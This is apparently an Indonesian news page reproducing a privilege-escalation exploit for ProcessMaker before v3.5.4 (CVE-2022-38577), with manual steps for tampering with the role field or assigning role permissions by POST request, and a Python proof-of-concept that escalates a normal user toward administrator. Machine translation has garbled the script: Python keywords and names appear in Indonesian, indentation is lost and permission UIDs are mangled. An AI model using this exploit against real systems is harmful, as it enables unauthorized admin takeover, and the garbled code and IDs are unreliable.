Eskalasi Hak Istimewa ProcessMaker

  • Whatsapp
Laravel Valet 2.0.3 Eskalasi Hak Istimewa
Laravel Valet Eskalasi Hak Istimewa

News.nextcloud.asia

# Judul Eksploitasi: ProcessMaker – Peningkatan Hak Istimewa Profil Pengguna
# Deskripsi: ProcessMaker sebelum v3.5.4 ditemukan mengandung izin tidak aman di halaman profil pengguna. Kerentanan ini memungkinkan penyerang untuk mengeskalasi pengguna normal ke Administrator.
# Tanggal: 20220822
# Eksploitasi Penulis: Sornram Kampeera (Sornram9254)
# Beranda Vendor: https://www.processmaker.com
# Tautan Perangkat Lunak: https://sourceforge.net/projects/processmaker/files/ProcessMaker/
# Versi: ProcessMaker sebelum v3.5.4 (Sudah Diuji pada 2.5.0, 2.5.2, 3.0 GA dan 3.2.1)
# Diuji pada: Windows 11, Debian 11 (WSL2)
#CVE : CVE-2022-38577

“””
Replikasi Eskalasi Hak Istimewa.
untuk 2.5.0 – 3.0 GA:
1. Masuk sebagai pengguna biasa.
2. Ubah “USR_ROLE” pada formulir permintaan posting saat memperbarui informasi profil menjadi “PROCESSMAKER_ADMIN”.
3. Segarkan halaman untuk mendapatkan peran baru.

untuk 3.2.1 dan sebelumnya:
1. Masuk sebagai pengguna biasa.
2. Dapatkan ID Peran dengan permintaan “/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc={epoch_time}”
3. Dapatkan ID Izin dengan permintaan “/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID={Role_ID}&type=show”
4. Perbarui peran ke hak eskalasi menggunakan permintaan POST Body:
POST /sysworkflow/en/neoclassic/roles/roles_Ajax
request=assignPermissionToRoleMultiple&ROL_UID={Role_ID}&PER_UID={PERMISSION_ID}
“””

#!/usr/bin/python
# TODO: Optimalkan kode [requests module]dan Penanganan Pengecualian.
# Ganti variabel USERNAME, PASSWORD, dan APP_URL.
permintaan impor, json, re, argparse, sys
USER_AGENT = ‘Mozilla/5.0’
APP_URL = “http://localhost:9994”
USERNAME = ‘__USER__’
SANDI = ‘__PASS__’

parser = argparse.ArgumentParser()
parser.add_argument(“action”, type=str, help=”Tambah atau Hapus izin peran.”, nargs=”?”, default=”.”)

parser.add_argument(“-a”, “–add”, action=”store_true”, help=”Tambahkan izin peran”)
parser.add_argument(“-d”, “–delete”, action=”store_true”, help=”Hapus izin peran”)
parser.add_argument(“-l”, “–list”, action=”store_true”, help=”Daftar semua peran”)
args = parser.parse_args()
jika args.add:
tindakan = “menetapkan”
elif args.delete:
tindakan = “hapus”
elif args.list:
tindakan = “daftar”
print(“Semua UID Izin”)
print(“Lihat selengkapnya: https://wiki.processmaker.com/3.3/Roles”)
PERM_LIST = “””
PER_UID: 000000000000000000000000000000001, PER_CODE: PM_LOGIN
PER_UID: 000000000000000000000000000000002, PER_CODE: PM_SETUP
PER_UID: 000000000000000000000000000000003, PER_CODE: PM_USERS
PER_UID: 000000000000000000000000000000004, PER_CODE: PM_FACTORY
PER_UID: 000000000000000000000000000000005, PER_CODE: PM_CASES
PER_UID: 00000000000000000000000000000000, PER_CODE: PM_ALLCASES
PER_UID: 000000000000000000000000000000007, PER_CODE: PM_REASSIGNCASE
PER_UID: 0000000000000000000000000000000008, PER_CODE: PM_REPORTS
PER_UID: 0000000000000000000000000000000009, PER_CODE: PM_SUPERVISOR
PER_UID: 000000000000000000000000000000000, PER_CODE: PM_SETUP_ADVANCE
PER_UID: 0000000000000000000000000000000011, PER_CODE: PM_DASHBOARD
PER_UID: 0000000000000000000000000000000012, PER_CODE: PM_WEBDAV
PER_UID: 0000000000000000000000000000000013, PER_CODE: PM_DELETECASE
PER_UID: 000000000000000000000000000000014, PER_CODE: PM_EDITPERSONALINFO
PER_UID: 000000000000000000000000000000015, PER_CODE: PM_FOLDERS_VIEW
PER_UID: 000000000000000000000000000000016, PER_CODE: PM_FOLDERS_ADD_FOLDER
PER_UID: 000000000000000000000000000000017, PER_CODE: PM_FOLDERS_ADD_FILE
PER_UID: 0000000000000000000000000000000018, PER_CODE: PM_CANCELCASE
PER_UID: 000000000000000000000000000000019, PER_CODE: PM_FOLDER_DELETE
PER_UID: 000000000000000000000000000000020, PER_CODE: PM_SETUP_LOGO
PER_UID: 0000000000000000000000000000000021, PER_CODE: PM_SETUP_EMAIL
PER_UID: 000000000000000000000000000022, PER_CODE: PM_SETUP_CALENDAR
PER_UID: 000000000000000000000000000000023, PER_CODE: PM_SETUP_PROCESS_CATEGORIES
PER_UID: 00000000000000000000000000000024, PER_CODE: PM_SETUP_CLEAR_CACHE
PER_UID: 000000000000000000000000000000025, PER_CODE: PM_SETUP_HEART_BEAT
PER_UID: 000000000000000000000000000000026, PER_CODE: PM_SETUP_ENVIRONMENT
PER_UID: 000000000000000000000000000000027, PER_CODE: PM_SETUP_PM_TABLES
PER_UID: 000000000000000000000000000000028, PER_CODE: PM_SETUP_LOGIN
PER_UID: 0000000000000000000000000000000029, PER_CODE: PM_SETUP_DASHBOARDS
PER_UID: 0000000000000000000000000000000030, PER_CODE: PM_SETUP_LANGUAGE
PER_UID: 0000000000000000000000000000000031, PER_CODE: PM_SETUP_SKIN
PER_UID: 00000000000000000000000000000032, PER_CODE: PM_SETUP_CASES_LIST_CACHE_BUILDER
PER_UID: 0000000000000000000000000000000033, PER_CODE: PM_SETUP_PLUGINS
PER_UID: 000000000000000000000000000000034, PER_CODE: PM_SETUP_USERS_AUTHENTICATION_SOURCES
PER_UID: 00000000000000000000000000000035, PER_CODE: PM_SETUP_LOGS
PER_UID: 00000000000000000000000000000036, PER_CODE: PM_DELETE_PROCESS_CASES
PER_UID: 000000000000000000000000000000037, PER_CODE: PM_EDITPERSONALINFO_CALENDAR
PER_UID: 0000000000000000000000000000000038, PER_CODE: PM_UNCANCELCASE
PER_UID: 000000000000000000000000000000039, PER_CODE: PM_REST_API_APPLICATIONS
PER_UID: 0000000000000000000000000000000040, PER_CODE: PM_EDIT_USER_PROFILE_FIRST_NAME
PER_UID: 0000000000000000000000000000000041, PER_CODE: PM_EDIT_USER_PROFILE_LAST_NAME
PER_UID: 000000000000000000000000000042, PER_CODE: PM_EDIT_USER_PROFILE_USERNAME
PER_UID: 0000000000000000000000000000000043, PER_CODE: PM_EDIT_USER_PROFILE_EMAIL
PER_UID: 000000000000000000000000000000044, PER_CODE: PM_EDIT_USER_PROFILE_ADDRESS
PER_UID: 000000000000000000000000000000045, PER_CODE: PM_EDIT_USER_PROFILE_ZIP_CODE
PER_UID: 0000000000000000000000000000000046, PER_CODE: PM_EDIT_USER_PROFILE_COUNTRY
PER_UID: 0000000000000000000000000000000047, PER_CODE: PM_EDIT_USER_PROFILE_STATE_OR_REGION
PER_UID: 0000000000000000000000000000000048, PER_CODE: PM_EDIT_USER_PROFILE_LOCATION
PER_UID: 0000000000000000000000000000000049, PER_CODE: PM_EDIT_USER_PROFILE_PHONE
PER_UID: 00000000000000000000000000000000, PER_CODE: PM_EDIT_USER_PROFILE_POSITION
PER_UID: 0000000000000000000000000000000051, PER_CODE: PM_EDIT_USER_PROFILE_REPLACED_BY
PER_UID: 000000000000000000000000000000052, PER_CODE: PM_EDIT_USER_PROFILE_EXPIRATION_DATE
PER_UID: 0000000000000000000000000000000053, PER_CODE: PM_EDIT_USER_PROFILE_CALENDAR
PER_UID: 000000000000000000000000000000054, PER_CODE: PM_EDIT_USER_PROFILE_STATUS
PER_UID: 0000000000000000000000000000000055, PER_CODE: PM_EDIT_USER_PROFILE_ROLE
PER_UID: 0000000000000000000000000000000056, PER_CODE: PM_EDIT_USER_PROFILE_TIME_ZONE
PER_UID: 0000000000000000000000000000000057, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_LANGUAGE
PER_UID: 0000000000000000000000000000000058, PER_CODE: PM_EDIT_USER_PROFILE_COSTS
PER_UID: 0000000000000000000000000000000059, PER_CODE: PM_EDIT_USER_PROFILE_PASSWORD
PER_UID: 0000000000000000000000000000000060, PER_CODE: PM_EDIT_USER_PROFILE_USER_MUST_CHANGE_PASSWORD_AT_NEXT_LOGON
PER_UID: 0000000000000000000000000000000061, PER_CODE: PM_EDIT_USER_PROFILE_PHOTO
PER_UID: 0000000000000000000000000000000062, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_MAIN_MENU_OPTIONS
PER_UID: 0000000000000000000000000000000063, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_CASES_MENU_OPTIONS
PER_UID: 0000000000000000000000000000000064, PER_CODE: PM_REASSIGNCASE_SUPERVISOR”””
cetak(PERM_LIST)
sistem.keluar()
kalau tidak:
print(“Contoh Izin UID”)
SAMPLE_PERM_LIST = “””>>> PER_UID: 000000000000000000000000000002, PER_CODE: PM_SETUP
>>> PER_UID: 000000000000000000000000000000000, PER_CODE: PM_SETUP_ADVANCE
>>> PER_UID: 0000000000000000000000000000000033, PER_CODE: PM_SETUP_PLUGINS

python Processmaker-PoC.py –help
python Processmaker-PoC.py –list
python Processmaker-PoC.py –tambahkan 000000000000000000000000000000002
python Processmaker-PoC.py –hapus 000000000000000000000000000000002″””
cetak(SAMPLE_PERM_LIST)
sistem.keluar()

PERMISSION_UID = args.action

loginData = “__notValidateThisFields__=[{‘name’:’USR_USERNAME’,’type’:’text’,’label’:’User’,’validate’:’Any’,’required’:’0′}]&”
loginData += “DynaformRequiredFields=[{‘name’:’USR_USERNAME’,’type’:’text’,’label’:’User’,’validate’:’Any’,’required’:’0′}]&”
loginData += “__DynaformName__=sysLogin&”
loginData += “formulir[BROWSER_TIME_ZONE_OFFSET]=25200&”
loginData += “formulir[USR_PASSWORD]=” + SANDI + “&”
loginData += “formulir[USR_USERNAME]=” + NAMA PENGGUNA + “&”
loginData += “formulir[USR_PASSWORD_MASK]=&”
loginData += “formulir[USER_ENV]= alur kerja&”
loginData += “formulir[USER_LANG]= dalam”

def getResponse(rMethod, rHeaders, rUrl,rData=None):
SSL_VERIFY = Salah
jika rMethod == ‘GET’:
respon = request.get(rUrl, headers=rHeaders, verifikasi=SSL_VERIFY, allow_redirects=True)
elif rMethod == “POST”:
respon = request.post(rUrl, data=rData, headers=rHeaders, verifikasi=SSL_VERIFY, allow_redirects=True)
kalau tidak:
print(“Pilihlah jawaban yang benar”)
balasan balasan

getCookie = getResponse(‘POST’,
{‘Content-Type’: ‘application/x-www-form-urlencoded’, ‘User-Agent’: USER_AGENT, ‘Connection’: ‘close’},
APP_URL + ‘/sys/en/neoclassic/login/sysLogin’,
loginData). cookie[‘PHPSESSID’]
jika getCookie bukan None:
getUserID = getResponse(‘GET’,
{‘User-Agent’: USER_AGENT, ‘Accept’: ‘*’, ‘Cookie’: ‘PHPSESSID=’ + getCookie, ‘Connection’: ‘close’},
APP_URL + ‘/sysworkflow/en/neoclassic/users/usersInit’)
USER_ID = re.findall(r”USR_UID\s=\s\”(\w{32})\””, getUserID.text, re.MULTILINE)[0]

getRolesName = getResponse(‘POST’,
{‘User-Agent’: USER_AGENT, ‘Accept’: ‘*’, ‘Cookie’: ‘PHPSESSID=’ + getCookie,’Content-Type’ : ‘application/x-www-form-urlencoded’, ‘Connection’: ‘menutup’},
APP_URL + ‘/sysworkflow/en/neoclassic/users/usersAjax’,
‘action=userData&USR_UID=’ + USER_ID)

getRolesList = getResponse( ‘GET’,
{‘User-Agent’: USER_AGENT, ‘Accept’: ‘*’, ‘Cookie’: ‘PHPSESSID=’ + getCookie, ‘Connection’: ‘close’},
APP_URL + ‘/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc=”)

getRolesPermission = getResponse(“POST’,
{‘User-Agent’: USER_AGENT, ‘Accept’: ‘*’, ‘Cookie’: ‘PHPSESSID=’ + getCookie, ‘Connection’: ‘close’},
APP_URL + ‘/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID=ROLE_UID&type=show’)

roleUID = re.findall(r”\”ROL_UID\”:\”(\w{32})\”,\”ROL_PARENT\”:\”\”,\”ROL_SYSTEM\”:\”\w{32} \”,\”SYS_CODE\”:\”PROCESSMAKER\”,\”ROL_CODE\”:\”” + json.loads(getRolesName.text)[‘user’][‘USR_ROLE’] + “\””, getRolesList.text, re.MULTILINE)[0]

def actionRoleResponse():
actionRoleStatus = getResponse(‘POST’,
{‘User-Agent’: USER_AGENT,’Content-Type’: ‘application/x-www-form-urlencoded’,’Cookie’: ‘PHPSESSID=’ + getCookie,’Connection’: ‘close’},
APP_URL + ‘/sysworkflow/en/neoclassic/roles/roles_Ajax’,
‘request=” + tindakan + “PermissionToRoleMultiple&ROL_UID=’ + roleUID + ‘&PER_UID=’ + PERMISSION_UID)
kembalikan actionRoleStatus.status_code

jika actionRoleResponse() == 200:
print(action.capitalize() + ” peran berhasil.”)
elif actionRoleResponse() == 503:
print(“Peran sudah ada.”)
kalau tidak:
print(“Error!”)

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.